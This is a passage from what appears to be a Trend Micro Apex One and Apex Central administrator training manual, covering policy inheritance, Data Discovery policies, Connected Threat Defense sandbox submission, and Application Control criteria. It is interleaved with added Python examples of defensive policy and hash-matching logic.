Although local administrators can make changes to the settings from the Apex One Web
Management console, these changes are overwritten every time Apex Central re-enforces the policy
settings. For certain product settings, Apex Central needs to obtain specific setting options from the
managed products. If administrators select multiple targets for a policy, Apex Central can only
obtain the setting options from the first selected target. To ensure a successful policy deployment,
make sure the product settings are synchronized across the targets.


Deploying the Policy


Once the policy settings are configured and the target selected, click Deploy. The Apex One policy
defined in the Apex Central Web Management console gets saved in the Apex One database and
deployed to selected target products. The policy will display in the Policy Management list as
Pending until it is applied on the endpoint. It takes several minutes for the policy to be applied to the
endpoint.

Once applied, the endpoint will display with a status of Deployed.


Policy Inheritance
Policy inheritance is useful in deployments with several Apex One Servers and where an Apex Central
administrative user manages global Apex One policies, and regional administrators define local or
regional policies requiring more specific settings.

Click to select a policy in the list and click Inherit Settings.

For each setting in the parent policy, configure whether it is inherited, customizable, or extendable by child policies.

Inherit From Parent


With this method, an Apex Central administrative user creating a child policy cannot change the
settings configured on the parent. For example, if the parent policy excludes PDF files from being
scanned during a Manual Scan, the administrative user cannot modify this setting in a child policy.


Are Customizable
With this method, an Apex Central administrative user creating a child policy can modify the
settings. For example, if a Scheduled Scan configured in the parent policy runs weekly and is
customizable, an administrative user can modify the schedule in the child policy to run the scan
daily.

Extend from parent


With this method, an Apex Central administrative user creating the child policy can add to the items
in the parent policy. For example, if the parent policy excludes 20 file names from being scanned
during a Manual Scan, the administrator can add 10 more file names that are deemed safe and
trustworthy.
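The three inheritance modes described above, as an added Python example (not Trend Micro code) that derives a child policy from a parent: inherited settings reject any change, customizable settings are replaced, and extendable lists can only grow. The setting names and values are constructed, and settings without a declared mode are assumed to be inherited.

```python
"""Derive a child policy from a parent under Apex Central inheritance modes (added example)."""
from collections.abc import Iterable
from copy import deepcopy
from typing import Dict

INHERIT, CUSTOMIZABLE, EXTEND = "inherit", "customizable", "extend"


class InheritanceError(ValueError):
    """A child policy tried to alter a setting the parent does not allow."""


def derive_child(parent: Dict[str, object], modes: Dict[str, str],
                 child_changes: Dict[str, object]) -> Dict[str, object]:
    """Build the effective settings of a child policy.

    ``modes`` maps a setting name to INHERIT (locked: the child cannot change
    it), CUSTOMIZABLE (the child may replace the value) or EXTEND (the child
    may only add entries to the parent's list). Settings missing from
    ``modes`` are treated as INHERIT (assumption). ``parent`` is not modified.
    """
    child = deepcopy(parent)
    for key, value in child_changes.items():
        mode = modes.get(key, INHERIT)
        if mode == INHERIT:
            # Re-stating the parent's value is harmless; anything else is rejected.
            if value != parent.get(key):
                raise InheritanceError(
                    f"'{key}' is inherited from the parent and cannot be changed")
        elif mode == CUSTOMIZABLE:
            child[key] = value
        elif mode == EXTEND:
            if isinstance(value, str) or not isinstance(value, Iterable):
                raise InheritanceError(f"'{key}' is extendable: pass the entries to add")
            base = list(parent.get(key, []))
            # Parent entries are always kept; the child may only append new ones.
            child[key] = base + [v for v in value if v not in base]
        else:
            raise InheritanceError(f"unknown inheritance mode '{mode}' for '{key}'")
    return child


def child_can_change(key: str, modes: Dict[str, str]) -> bool:
    """True if a child policy is allowed to touch this setting at all."""
    return modes.get(key, INHERIT) != INHERIT


# Constructed parent policy mirroring the examples in the text.
PARENT = {
    "manual_scan_exclusions": ["*.pdf", "*.iso"],   # EXTEND: child may add names
    "scheduled_scan": "weekly",                     # CUSTOMIZABLE: child may change
    "realtime_scan": True,                          # INHERIT: locked
}
MODES = {
    "manual_scan_exclusions": EXTEND,
    "scheduled_scan": CUSTOMIZABLE,
    "realtime_scan": INHERIT,
}

if __name__ == "__main__":
    regional = derive_child(PARENT, MODES, {
        "scheduled_scan": "daily",
        "manual_scan_exclusions": ["*.bak"],
    })
    print(regional)
    try:
        derive_child(PARENT, MODES, {"realtime_scan": False})
    except InheritanceError as err:
        print("rejected:", err)
```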

Data Discovery Policies


Apex Central integration with Data Loss Prevention allows administrators to manage and deploy Data
Loss Prevention through Policy Management from the Apex Central Web Management console.

Data Discovery
In Apex Central and Apex One, Data Loss Prevention integration includes the ability to also protect
data that is at rest. This allows Apex Central to scan file storage areas to identify where sensitive
content is located. For example, it can be used to scan endpoints and identify documents containing
credit card number information. Policies can dictate that if the endpoint is not authorized to store
this type of data, the file must be encrypted.

Data Discovery tasks can be set up and scheduled to run on Security Agents. The schedule details are
set as part of the policy settings. Additionally, sensitive files can be encrypted with a password or
user/group key if Trend Micro File Encryption is installed. Also note that a Data Discovery task can
resume if the scan service was stopped before the task completed, and if the policy is unchanged the
Data Discovery task can perform an incremental scan.

Data Discovery Policy Management


Data Discovery policies search databases, endpoints and document management systems for the
presence of sensitive information. Data Discovery widgets display data loss prevention compliance
with an enterprise's policy. Using Data Discovery policies and widgets administrators can then
perform remediation actions on their network.


1 In the Apex Central Web Management console, click Policies > Policy Management. Select Apex
One Data Loss Prevention from the Product list.
Click Create or Create one now to create a new policy.

2 Click the Internal Agents or External Agents tabs as needed. Expand Apex One DLP and Apex
One Data Discovery settings and enable them as needed.

3 Click Add in the Apex One Data Discovery section to create a new Data Discovery rule.
4 Click to enable the rule and specify a unique name for the rule. Complete the tabs in the Data
Discovery Policy Settings window.


Target Folder

• File location: Specify the folder to scan for files
• File Type Exceptions: Specify any file type scanning exceptions

Note: Data Discovery supports the following wildcard characters:
*: Substitute all characters before or after the *
?: Substitute for a single character or a single double-byte character

You can separate multiple entries with pipes ( | ) using the following format:
For files: *.<file_extension> (for example: *.exe|*.doc)
For folders: Specify a file path (for example: *\Test\*|C:\My-Docs\)
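The wildcard and pipe syntax in the note above, implemented as an added Python example (not Trend Micro code): it turns file and folder entries into patterns and decides whether a given path would be excluded from a Data Discovery scan. It assumes a folder entry covers everything beneath that folder and that matching is case-insensitive; the sample paths are constructed.

```python
"""Match paths against Data Discovery style exception entries (added example)."""
import re
from typing import List, Pattern


def _compile(entry: str, anchor_end: bool) -> Pattern:
    """Translate one entry into a regular expression.

    '*' becomes '.*' and '?' becomes '.'; every other character is matched
    literally. Folder entries are compiled without a trailing anchor so that
    an entry such as C:\\My-Docs\\ covers the whole subtree (assumption).
    """
    regex = "".join(".*" if c == "*" else "." if c == "?" else re.escape(c)
                    for c in entry)
    return re.compile("^" + regex + ("$" if anchor_end else ""), re.IGNORECASE)


def parse_entries(spec: str, anchor_end: bool) -> List[Pattern]:
    """Split a pipe separated list such as '*.exe|*.doc' into patterns."""
    return [_compile(e.strip(), anchor_end) for e in spec.split("|") if e.strip()]


def _normalise(path: str) -> str:
    # Accept forward slashes too, but compare everything as Windows paths.
    return path.replace("/", "\\")


def file_excluded(path: str, file_spec: str) -> bool:
    """True when the file name matches a File Type Exceptions entry."""
    name = _normalise(path).rsplit("\\", 1)[-1]
    return any(p.match(name) for p in parse_entries(file_spec, anchor_end=True))


def folder_excluded(path: str, folder_spec: str) -> bool:
    """True when the file sits in, or under, an excluded folder entry."""
    return any(p.match(_normalise(path))
               for p in parse_entries(folder_spec, anchor_end=False))


def should_scan(path: str, file_spec: str = "", folder_spec: str = "") -> bool:
    """Decide whether a Data Discovery scan should open this file at all."""
    return not (file_excluded(path, file_spec) or folder_excluded(path, folder_spec))


# Constructed exception strings using the note's own examples.
FILE_EXCEPTIONS = "*.exe|*.doc"
FOLDER_EXCEPTIONS = "*\\Test\\*|C:\\My-Docs\\"

if __name__ == "__main__":
    for sample in ("C:\\Users\\a\\setup.exe", "C:\\Users\\a\\notes.docx",
                   "C:\\Proj\\Test\\plan.xlsx", "C:\\My-Docs\\q\\report.xlsx",
                   "C:\\Testing\\plan.xlsx"):
        print(sample, "->", "scan" if should_scan(sample, FILE_EXCEPTIONS, FOLDER_EXCEPTIONS) else "skip")
```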

Template

Select any appropriate templates from the Available Templates list and then click Add to move
them to the Selected templates list.


Actions

Specify one or more of the following actions to perform when the policy is triggered:
• Monitor: Detections are recorded for analysis
• Encrypt: Sensitive files are encrypted using one of the listed methods. Integration with
Trend Micro Endpoint Encryption is required to enable this capability.

Schedule

Configure a schedule for the scan.

Click Save to preserve the selections in Policy Settings, then Deploy to push the policy to the
identified endpoint computers.


5 The policy will display as Pending until it is deployed to the endpoints.

Once applied, the endpoint will display with a status of Deployed.


6 An alert on the endpoint will prompt the end user to restart the computer to complete the
process.

Incident Investigation
Data Leak Prevention incidents can be reviewed and updated by Data Leak Prevention compliance
officers and incident reviewers.

To enable the incident review process, Apex Central administrators will need to complete some
prerequisite tasks. These tasks are summarized below:
• Set up manager information in Active Directory
• Set up Active Directory integration to obtain user information
• Create user accounts specific for Data Leak Prevention incident investigation. Assign DLP
Compliance Officer or DLP Incident Reviewer roles to users investigating Data Leak
Prevention incidents (Remember that the DLP Compliance Officer and DLP Incident
Reviewer roles are available to Active Directory users only.)
• Set up the Scheduled incident summary and Incident details updated notifications
• Export Data Leak Prevention logs for auditing purposes


After completing the above steps, DLP investigators will be able to view Data Leak Prevention and
Data Discovery events from Apex Central by selecting Detections > Logs > Log Query.

Lesson 15: Detecting Emerging Malware Through Connected Threat Defense

Lesson Objectives:

After completing this lesson, participants will be able to:


• Describe the components of the Connected Threat Defense system
• Integrate Deep Discovery Analyzer with Apex Central
• Track a suspicious object through the Connected Threat Defense cycle

In the modern data center, more and more security breaches are a result of targeted attacks using
techniques such as phishing and spear-phishing. In these cases, malware writers can bypass traditional
malware scanners by creating malware specifically targeted for your environment. Apex One adds
enhanced malware protection for new and emerging threats through Connected Threat Defense.

Using heuristic detection, Apex One can identify document files that are deemed suspicious and submit
them automatically to Deep Discovery Analyzer for analysis. If the analysis indicates that a particular file
does contain malware, Deep Discovery will provide the information to Apex Central where an action for
this particular malware can be specified. Apex One can use the Suspicious Object List from Apex Central
to update its malware policies and remediate threats.

Connected Threat Defense allows multiple Trend Micro products to share threat information and
analysis across multiple layers of protection critical to defending against advanced threats. Connected
Threat Defense includes a complete set of security technology to detect, respond to and protect against
advanced threats.

[Figure: the Connected Threat Defense cycle: Detect, Respond, Protect.]


Detect
Components of the Connected Threat Defense detect advanced malware, behavior and
communications invisible to standard defenses. Connected Threat Defense analyzes the risk and
nature of the attack and attacker within sandboxes to reveal malicious actions without relying on
malware signatures.

Respond
Components of the Connected Threat Defense enable rapid response through shared threat
intelligence and delivery of real-time security updates.

Protect
Components of the Connected Threat Defense assess potential vulnerabilities and proactively
protect endpoints, servers and applications.

Visibility and control


Components of the Connected Threat Defense provide visibility across the system and analyze and
assess the impact of threats.

Apex One’s participation in Connected Threat Defense requires you to set up a connection between the
Apex One Server, Deep Discovery Analyzer and Apex Central.

Connected Threat Defense Requirements


To participate in the Connected Threat Defense lifecycle, verify that your environment meets these
requirements:
• Apex One Server is installed and configured with Security Agents protecting computers
• Deep Discovery Analyzer is installed and the sandbox virtual machines are provisioned
• Apex Central is installed
• Deep Discovery Analyzer and Apex One Server have been added to the Apex Central Managed
Servers list and Product Directory


How Connected Threat Defense Works


When all the components are deployed and configured correctly Connected Threat Defense operates as
described below.

[Figure: Connected Threat Defense flow between the Security Agent, Apex One Server, Deep Discovery Analyzer and Apex Central; the numbered steps are described below.]

1 Security Agents are configured with rules to enable detection of malware on the protected
computers. Anti-Malware policies define how suspicious objects are to be handled.
2 Objects deemed to be suspicious are gathered and submitted to the Apex One Server.
Suspicious objects can include:
- Programs not known to Trend Micro downloaded through a web browser or email
channels
- Heuristic detections of processes downloaded through a web browser or email channels
- Low prevalence autorun programs on removable storage
3 The Apex One Server submits the suspicious objects to Deep Discovery Analyzer for analysis.
The objects are submitted to the Analyzer every 15 minutes by default.
4 Deep Discovery Analyzer executes and observes the suspicious file in a secure, isolated virtual
sandbox environment.
5 Deep Discovery Analyzer pushes the analysis results to Apex Central, where an action can be
specified for the file based on the analysis. The analysis report is pushed to Apex Central every
10 minutes by default. Once the action is specified, a list of emerging threats called a Suspicious
Object List is created or updated. Other Trend Micro products, such as Deep Security, Deep
Discovery Inspector or Deep Discovery Email Inspector, may also be connected to Apex Central
and be able to update the list.
6 The Apex One Server receives the list of suspicious objects from Apex Central. This list is
retrieved every 15 minutes by default.
7 The list is forwarded to Agents where protection against the suspicious object is applied.


Suspicious Activities
Deep Discovery Analyzer monitors the sandbox environment for activities deemed to be suspicious.
The activities include the items listed below.

Deep Discovery Analyzer


Deep Discovery Analyzer provides custom sandbox analysis using virtual images that are tuned to
precisely match your system configurations, drivers, installed applications, and language versions. This
approach improves the detection rate of advanced threats that are designed to evade standard virtual
images. The custom sandbox environment includes safe external access to identify and analyze multi-
stage downloads, URLs, command and control (C&C), and more, as well as supporting manual or
automated file and URL submission.

Apex One can send these file types to Deep Discovery Analyzer:
• cell - Cell spreadsheet document
• chm - Compiled HTML file
• class - Java class file
• dll - Dynamic Link Library
• doc - Microsoft Word document
• docx - Microsoft Word 2007 and later document
• exe - Executable file
• gul - JungUm Global document
• hwp - Hancom Hangul Word Processor (HWP) document
• hwpx - Hancom Hangul Word Processor 2014 (HWPX) document
• jar - Java Applet Java application
• js - JavaScript file
• jse - JavaScript encoded script file
• jtd - JustSystems Ichitaro document
• lnk - Microsoft Windows Shell Binary Link shortcut
• mov - Apple QuickTime media
• pdf - Adobe Portable Document Format
• ppt - Microsoft PowerPoint presentation
• pptx - Microsoft PowerPoint 2007 and later presentation
• ps1 - Microsoft Windows PowerShell script file
• rtf - Microsoft Rich Text Format document
• swf - Adobe Shockwave Flash file
• vbe - Visual Basic encoded script file
• vbs - Visual Basic script file
• xls - Microsoft Excel spreadsheet
• xlsx - Microsoft Excel 2007 and later spreadsheet
• xml - Microsoft Office 2003 and later XML file

Connecting Deep Discovery Analyzer to Apex Central


The Deep Discovery Analyzer must be added as a Managed Server in Apex Central.
1 In the Apex Central Web Management console, click Administration > Managed Servers > Server
Registration.
2 Select Deep Discovery Analyzer from the Server Type list and click Add a product.


3 Type the details of the Deep Discovery Analyzer device and click Save.

4 Deep Discovery Analyzer is now listed as a Managed Server.

Adding Deep Discovery Analyzer to the Apex Central Product Directory

In the Apex Central Web Management console, add the Deep Discovery Analyzer to the Product
Directories list.


1 In the Apex Central Web Management console, click Directories > Products and click Directory
Management.

2 Expand the New Entity folder. Drag the Analyzer device from New Entity folder to the previously
created Trend Micro Servers folder.

When prompted, click OK to acknowledge the move.


The Deep Discovery Analyzer should be displayed in the Trend Micro Servers folder.

Suspicious Objects
When Deep Discovery Analyzer discovers suspicious objects through the sandbox analysis of a file, it can
send information about the object (SHA-1, URL, IP, Domain) to Apex Central for local sharing. Apex
Central can also send the Suspicious Object List, along with executable files, to the Trend Micro Smart
Protection Network.

Trend Micro will validate the suspicious objects within a maximum of 6 hours. If suspicious objects are
found to be malicious they will be added to Smart Protection Network and all products which integrate
with the network can leverage this information.

Other Indicators of Compromise may also be manually configured and sent to Apex Central.

Trend Micro products, including Apex One and Deep Security, sync with Apex Central to obtain updated
Suspicious Object Lists.

The process for handling suspicious objects can be broken down into the following phases:

Submitting Samples
Apex One and other Trend Micro products use administrator-configured file submission rules to
determine the samples to submit to Virtual Analyzer.

Analyzing Samples
Deep Discovery Analyzer tracks and analyzes the submitted samples. Analyzer flags suspicious
objects based on their potential to expose systems to danger or loss. Supported objects include files
(SHA-1 hash values), IP addresses, domains, and URLs.


Distributing Suspicious Object Details


Apex Central consolidates suspicious objects and scan actions against the objects and then
distributes them to other products.
• Exceptions to Virtual Analyzer Suspicious Objects: Apex Central administrators can select
objects from the list of suspicious objects that are considered safe and then add them to an
exception list. Apex Central sends the exception list back to the products integrated with
Virtual Analyzer. If a suspicious object from a managed product matches an object in the
exception list, the product no longer sends it to Apex Central.
• User-Defined Suspicious Objects: Apex Central administrators can add objects they consider
suspicious but are not currently in the list of Virtual Analyzer suspicious objects.
• Suspicious Object Distribution: Apex Central consolidates Virtual Analyzer and user-defined
suspicious objects (excluding exceptions) and sends them to other managed products. These
products synchronize and use all or some of these objects.

Configure scan actions (log, block, or quarantine) against suspicious objects that affect computers.
Block and quarantine actions are considered active actions, while the log action is considered
passive. If products take an active action, Apex Central declares the affected computers as
mitigated. If the action is passive, computers are declared at risk.

Scan actions are configured separately for Virtual Analyzer and user-defined suspicious objects.
Apex Central automatically deploys the actions to certain managed products.

Mitigating Threats
Security Agents perform active scan actions against suspicious objects.

When the scan action configured in Apex Central and deployed to Security Agents is Block or
Quarantine, the affected computers are considered mitigated.

Apex Central also checks Web Reputation, URL filtering, network content inspection, and rule-based
detection logs received from all managed products and then compares them with its list of
suspicious objects. If there is a match from a specific computer and the managed product takes an
active action such as Block, Delete, Quarantine, or Override, Apex Central treats the computer as
mitigated.
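The matching and status logic described in the Distributing and Mitigating phases above, as an added example that is not Apex Central's own code. It consolidates Virtual Analyzer and user-defined objects minus the exception list, matches constructed product log lines against the list by object type (SHA-1, URL, IP, Domain), and classifies each endpoint as mitigated or at risk depending on whether the product's action was active or passive. The key=value log format, the field names and the object shape are assumptions made for the illustration:

```python
"""Added example (not Apex Central code): matching a consolidated Suspicious
Object List against product detection logs and deriving the 'mitigated' vs
'at risk' status the lesson describes.

All data below is constructed; the key=value log format, the field names and
the SuspiciousObject shape are assumptions for illustration, not Trend Micro's
real schema."""
from dataclasses import dataclass

# Actions the lesson calls active: a matching endpoint counts as mitigated.
# Anything else (for example Log) is passive: the endpoint stays at risk.
ACTIVE_ACTIONS = {"Block", "Delete", "Quarantine", "Override"}

# Object type -> the (assumed) log field that carries the same kind of value.
LOG_FIELD_FOR_KIND = {"SHA-1": "sha1", "URL": "url", "IP": "ip", "Domain": "domain"}


@dataclass(frozen=True)
class SuspiciousObject:
    kind: str    # "SHA-1", "URL", "IP" or "Domain"
    value: str
    source: str  # "virtual_analyzer" or "user_defined"


def consolidate(va_objects, user_objects, exceptions):
    """Union of Virtual Analyzer and user-defined objects, minus the exception list.

    Returns a dict keyed by (kind, lower-cased value) so matching is case-insensitive.
    """
    excluded = {(o.kind, o.value.lower()) for o in exceptions}
    consolidated = {}
    for obj in list(va_objects) + list(user_objects):
        key = (obj.kind, obj.value.lower())
        if key not in excluded:
            consolidated.setdefault(key, obj)
    return consolidated


def parse_log(line):
    """Parse one constructed 'key=value key=value' log line into a dict."""
    return dict(part.split("=", 1) for part in line.split() if "=" in part)


def match_log(entry, so_list):
    """Return the suspicious object a log entry refers to, or None."""
    for kind, log_field in LOG_FIELD_FOR_KIND.items():
        value = entry.get(log_field)
        if value and (kind, value.lower()) in so_list:
            return so_list[(kind, value.lower())]
    return None


def endpoint_status(log_lines, so_list):
    """Classify each endpoint as 'mitigated', 'at risk' or 'clean'.

    One active action on a matching object is enough to count the endpoint as
    mitigated; a passive action with no active one leaves it at risk.
    """
    status = {}
    for line in log_lines:
        entry = parse_log(line)
        host = entry["host"]
        status.setdefault(host, "clean")
        if match_log(entry, so_list) is None:
            continue
        if entry.get("action") in ACTIVE_ACTIONS:
            status[host] = "mitigated"
        elif status[host] != "mitigated":
            status[host] = "at risk"
    return status


# Constructed sample data (TEST-NET address and .example names, not real IoCs).
VA_OBJECTS = [
    SuspiciousObject("SHA-1", "0123456789abcdef0123456789abcdef01234567", "virtual_analyzer"),
    SuspiciousObject("Domain", "malicious.example", "virtual_analyzer"),
    SuspiciousObject("IP", "203.0.113.77", "virtual_analyzer"),
]
USER_OBJECTS = [SuspiciousObject("URL", "http://phish.example/login", "user_defined")]
EXCEPTIONS = [SuspiciousObject("IP", "203.0.113.77", "virtual_analyzer")]  # judged safe by an admin

SAMPLE_LOGS = [
    "host=WS01 product=ApexOne sha1=0123456789ABCDEF0123456789ABCDEF01234567 action=Quarantine",
    "host=WS02 product=ApexOne domain=malicious.example action=Log",
    "host=WS03 product=DeepSecurity ip=203.0.113.77 action=Block",
    "host=WS04 product=ApexOne url=http://phish.example/login action=Block",
]


def demo():
    """Run the constructed logs against the consolidated list."""
    return endpoint_status(SAMPLE_LOGS, consolidate(VA_OBJECTS, USER_OBJECTS, EXCEPTIONS))


if __name__ == "__main__":
    for host, state in sorted(demo().items()):
        print(host, state)
```

WS03 ends up clean rather than mitigated because the administrator placed the IP on the exception list, so it never reaches the consolidated list; WS02 stays at risk because Log is a passive action.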

Subscribing Apex One to the Suspicious Objects List


Apex One subscribes to the Suspicious Object List to retrieve the list on a regular basis.


1 In the Apex One Web Management console, click Administration > Settings > Suspicious
Object List. In the Agent Settings section, verify that URL, IP, File and Domain are all enabled.

2 Click Test Connection. A success message should be displayed in the console window.

3 Click Save.

4 In the Agent Management list, right-click a domain or an Agent and click Settings >
Sample Submission. Click to enable suspicious file submission to Virtual Analyzer and click Save.

5 A message is displayed confirming that the configuration settings have been applied.


Tracking Suspicious Objects


Submissions from the Security Agents are sent to the Apex One Server before being forwarded to the
Deep Discovery Analyzer. The submitted items can be viewed on the Apex One Server before they are
sent to the Deep Discovery Analyzer in the following folder:
...\TEMP\Sample Submission

In the Deep Discovery Analyzer Web Management console, click Virtual Analyzer > Submissions. On the
Processing tab, any submitted files currently being processed by the Analyzer will be listed under
today's date. There will be some delay before the file is submitted to the Deep Discovery Analyzer by the
Apex One Server.

Once the submission has been processed, the entry will be displayed on the Completed tab. There
will be some delay while the file is processed.


Once the processing is complete, click Virtual Analyzer > Suspicious Objects. The object is now visible
in the list.

The details of the suspicious object are submitted to Apex Central for addition to the Suspicious
Objects List. In the Apex Central Web Management console click Administration > Threat Intel >
Virtual Analyzer Suspicious Objects to view the details in the list. You may need to wait several
minutes for the results of the analysis to be passed to Apex Central.


The action to be performed the next time the suspicious object is encountered can be configured.
Click to select the object in the list and click Configure Scan Action.

In the Scan Action window, select an action, for example, Block in the For selected files section and
click Apply.

When prompted, confirm the application of the scan action. Click Apply Scan Action.


The Scan Action is changed to Block.

Apex One will retrieve the Suspicious Object list from Apex Central on a regular basis. An
administrator can also trigger the retrieval of the list manually. In the Apex One Web Management
console, click Administration > Settings > Suspicious Object List.

Under the Suspicious Object List Subscription section, click Sync Now.

The Security Agent will obtain the Suspicious Objects List from the Apex One Server on its next
update.

When the Security Agent encounters the suspicious object in the future, a suspicious file violation
will be displayed.


Lesson 16: Blocking Unapproved Applications on Endpoint Computers

Lesson Objectives:

After completing this lesson, participants will be able to:


• Define Application Control criteria to specify allow or block actions
• Create Application Control policies

Apex One’s defense against malware and targeted attacks can be enhanced by preventing unwanted or
unapproved applications from executing on Windows endpoint computers. Administrators configure
policies and rules to define applications and then specify an operation of Allow or Block to be performed
on the defined applications when encountered on the endpoint computer.

Integrated Application Control NEW

Application Control functionality integrated into Apex One can monitor applications on an endpoint and
prevent unknown applications from running. A separate Agent and Server are no longer needed to
provide Application Control capabilities.

If the separate Agent is in use for an existing OfficeScan XG installation, it will be automatically
uninstalled when Application Control policies are deployed and a new Apex One service will be launched
to integrate Application Control.

Policies using Apex One Application Control must be deployed through Apex Central.

Note: Application Control in Apex One is available for Windows endpoint computers only.

Lockdown Mode
When in Lockdown Mode, Security Agents block all applications not identified during an inventory scan.
After endpoints receive this command, Application Control scans the endpoint and creates a complete
application inventory. A hash value is calculated for every application on the computer, and the values are
stored in the invt.db file on the endpoint computer. Application Control then locks down the endpoint
and does not permit access to:
• Any application that does not specifically match Allow criteria defined in the User-defined Rule
table
• Any application that does not specifically match assessment criteria defined in the User-defined
Rule table
• Any application not found in the inventory scan results for that particular endpoint

As an option, applications from Trend Micro trusted vendors can be excluded from lockdown. Click this
option to automatically allow all applications that Trend Micro threat experts have determined to come
from trusted vendors.

Application Control Criteria


Application Control provides the ability to define criteria that specifically allow or block certain
applications from executing.

You can define Allow criteria to ensure that Application Control never blocks a certain application, or
you can create a complete list of applications allowed to execute on endpoints and then deploy a
Lockdown policy to the endpoints. While in Lockdown mode, users cannot execute, access, or install any
application that you did not include in the allow criteria.

You can define Block criteria to ensure that Application Control always blocks certain applications or you
can create Assessment criteria to monitor the applications that users access. Application Control logs all
applications that match the assessment criteria but takes no further action and allows the applications
to execute normally.

Application Control Criteria defines applications through the following attributes:


• File Hash
• File Path
• Certificate
• Certified Software Pattern
• Gray Software

File Hash
Every file, including an application, has a unique hash value. For example, notepad.exe has the
following hash values:
• SHA-1 value: 867B54F1BC5B71045A9A00BACA485A24176B202C
• SHA-256 value:
899346F9F283A4FD5AA03015A3F58CDE5B9C0B6A5C4D64C2CC74E9B22C1348D7

Application Control can use these hash values (either the SHA-1 or SHA-256 result) as the basis for
identifying an application on which to perform the Allow or Block operation.

In creating a Hash rule, there are two input methods:


• Manual
• Import


Manual Input

Manual input allows administrators to enter the SHA-1 or SHA-256 values for identified
applications. The list cannot contain a mixture of SHA-1 and SHA-256 formats, and
administrators can manually specify up to 20 hash values with their description.

Import

This method uses the results from the Hash Generation Tool to identify the applications on the
endpoint. The Hash Generator Tool scans and creates a SHA-256 hash value list of all portable
executable (application) files found on an endpoint. You can then import the hash value list into
Application Control rules to specifically allow the execution of all identified applications. The
hash value file can also be created manually, following the appropriate format. A sample CSV file
can be downloaded directly from the Hash Values Criteria settings window.

Typically, the Hash Generator Tool is run on the golden image of the endpoint computer to build
a common baseline for creating an allow criteria with the known good application inventory.


This method only supports SHA-256 hashes and the file import has a maximum size of 4MB.
Each criteria only accepts one file; if a new file is imported, all existing hashes are overwritten.

The Hash Generation tool (TMiACHashGen.exe) can be downloaded directly from the Hash
Values Criteria settings window, or directly from the following URL:
https://success.trendmicro.com/solution/1120385

Alternately, the hash file can be created manually in a CSV file with the appropriate formatting.
A CSV sample file can also be downloaded from the Hash Values Criteria settings window.
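The Lockdown Mode inventory scan and the hash-based criteria above (manual SHA-1/SHA-256 entry, the Hash Generation Tool's SHA-256 list import), as one added example that is not Trend Micro's tool or Application Control code. It hashes the portable-executable files under a directory to build an inventory, exports them as CSV rows, validates a manual hash list against the lesson's single-format and 20-entry limits, and returns a Lockdown-style allow/block decision for files launched later. Assumptions not taken from the lesson: a PE file is recognised by its 'MZ' header, the CSV layout 'sha256,filename' stands in for the tool's real format, and under Lockdown a file may run if it matches an Allow hash or is in the inventory:

```python
"""Added example (not Trend Micro's Hash Generation Tool or Application Control):
inventory scan, CSV export, manual hash list validation and a Lockdown decision.

Assumptions (not taken from the lesson): a PE file is recognised by its 'MZ'
header; the CSV layout 'sha256,filename' is a stand-in for the real format;
in Lockdown a file runs if it matches an Allow hash or is in the inventory."""
import csv
import hashlib
import io
import os
import tempfile

MAX_MANUAL_HASHES = 20  # the lesson's limit for manually entered hash values


def file_hashes(path):
    """Return (SHA-1, SHA-256) hex digests of a file, upper-cased."""
    sha1, sha256 = hashlib.sha1(), hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            sha1.update(chunk)
            sha256.update(chunk)
    return sha1.hexdigest().upper(), sha256.hexdigest().upper()


def is_pe(path):
    """Cheap PE check used here: the DOS header starts with 'MZ'."""
    with open(path, "rb") as fh:
        return fh.read(2) == b"MZ"


def build_inventory(root):
    """Inventory scan: SHA-256 of every PE file under root, keyed by digest."""
    inventory = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            full = os.path.join(dirpath, name)
            if is_pe(full):
                inventory[file_hashes(full)[1]] = full
    return inventory


def inventory_to_csv(inventory):
    """Export the inventory as 'sha256,filename' rows (assumed layout)."""
    buf = io.StringIO()
    writer = csv.writer(buf, lineterminator="\n")
    for digest, path in sorted(inventory.items()):
        writer.writerow([digest, os.path.basename(path)])
    return buf.getvalue()


def parse_manual_hashes(entries):
    """Validate a manual list: one format only (all SHA-1 or all SHA-256), at most 20 entries."""
    if len(entries) > MAX_MANUAL_HASHES:
        raise ValueError("manual input accepts at most %d hash values" % MAX_MANUAL_HASHES)
    lengths = {len(h) for h in entries}
    if lengths - {40, 64}:
        raise ValueError("hash values must be SHA-1 (40 hex digits) or SHA-256 (64 hex digits)")
    if len(lengths) > 1:
        raise ValueError("a list cannot mix SHA-1 and SHA-256 values")
    return {h.upper() for h in entries}


def manual_list_error(entries):
    """Return the validation error text for a manual list, or None if it is acceptable."""
    try:
        parse_manual_hashes(entries)
    except ValueError as exc:
        return str(exc)
    return None


def lockdown_decision(path, inventory, allow_hashes):
    """Lockdown: execution is allowed only by Allow criteria or inventory membership."""
    sha1, sha256 = file_hashes(path)
    if sha1 in allow_hashes or sha256 in allow_hashes:
        return "allow (matches Allow criteria)"
    if sha256 in inventory:
        return "allow (in inventory)"
    return "block (not in inventory, no Allow criteria)"


def demo():
    """Constructed endpoint: two PE stand-ins in the golden image, two files arriving later."""
    with tempfile.TemporaryDirectory() as root:
        for name, body in (("app.exe", b"MZ app v1"), ("tool.exe", b"MZ tool"), ("readme.txt", b"hello")):
            with open(os.path.join(root, name), "wb") as fh:
                fh.write(body)
        inventory = build_inventory(root)  # taken before lockdown is switched on
        csv_rows = inventory_to_csv(inventory).strip().splitlines()
        allow = parse_manual_hashes([hashlib.sha256(b"MZ updater").hexdigest()])
        result = {"inventory_size": len(inventory), "csv_rows": len(csv_rows),
                  "app.exe": lockdown_decision(os.path.join(root, "app.exe"), inventory, allow)}
        for name, body in (("updater.exe", b"MZ updater"), ("dropped.exe", b"MZ something new")):
            with open(os.path.join(root, name), "wb") as fh:
                fh.write(body)
            result[name] = lockdown_decision(os.path.join(root, name), inventory, allow)
        return result


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

The text file is skipped by the inventory scan, the pre-approved updater runs because its hash is on the Allow list, and the file that appeared after the golden image was taken is blocked; this is the maintenance cost the Pros and Cons table later attributes to hash criteria, since every new version needs a new hash.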

File Paths
You can configure Application Control to specifically target certain directory locations based on
absolute path, storage type, and Perl Compatible Regular Expressions (PCRE).

File paths can include any of the following:


• Specific path: Only applies to applications in the exact path specified
• Any built-in storage: Only applies to applications in the path specified and stored on an
internal storage device (internal hard disk drive)
• Any local storage: Only applies to applications in the path specified and stored on a non-
removable local storage device (internal or external hard disk drive)
• Any removable storage: Only applies to applications in the path specified and stored on a
removable storage device (USB drive, CD/DVD)
• Network path: Only applies to applications in the path specified and stored on a shared
network resource
